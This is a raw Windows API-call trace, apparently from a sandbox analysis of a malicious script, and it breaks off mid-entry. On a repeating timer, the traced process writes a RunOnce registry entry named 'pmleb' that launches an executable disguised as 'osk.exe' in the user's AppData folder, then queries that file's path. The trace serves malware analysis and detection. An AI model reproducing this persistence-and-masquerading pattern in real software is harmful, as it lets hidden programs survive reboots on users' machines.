[0080.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.082] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.083] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.083] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.083] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.083] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.083] RegCloseKey (hKey=0x280) returned 0x0 [0080.083] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.083] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.083] SetTimer (hWnd=0x20280, nIDEvent=0x2064, uElapse=0xa, lpTimerFunc=0x0) returned 0x2064 [0080.083] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.096] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.096] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.096] KillTimer (hWnd=0x20280, uIDEvent=0x2064) returned 1 [0080.096] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.096] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.096] IUnknown:Release (This=0x787518) returned 0x1 [0080.097] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.097] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.097] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.097] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.097] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.097] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0080.097] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.097] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x66 [0080.097] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.098] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0080.098] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.098] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.098] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.099] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.099] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.099] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.099] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.099] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.099] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.099] RegCloseKey (hKey=0x280) returned 0x0 [0080.099] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.099] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.099] SetTimer (hWnd=0x20280, nIDEvent=0x2065, uElapse=0xa, lpTimerFunc=0x0) returned 0x2065 [0080.099] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.123] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.123] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.123] KillTimer (hWnd=0x20280, uIDEvent=0x2065) returned 1 [0080.124] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.124] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0080.124] IUnknown:Release (This=0x787518) returned 0x1 [0080.124] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.124] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.124] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.125] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.125] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0080.125] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.125] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x67 [0080.125] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.126] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0080.126] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.126] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.126] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.126] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.126] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.126] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.126] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.127] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.127] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.127] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.127] RegCloseKey (hKey=0x280) returned 0x0 [0080.127] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.127] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.127] SetTimer (hWnd=0x20280, nIDEvent=0x2066, uElapse=0xa, lpTimerFunc=0x0) returned 0x2066 [0080.128] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.143] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.143] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.143] KillTimer (hWnd=0x20280, uIDEvent=0x2066) returned 1 [0080.143] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.143] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.143] IUnknown:Release (This=0x787518) returned 0x1 [0080.143] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.144] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.144] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.144] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.144] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.144] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0080.144] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.144] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x68 [0080.144] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
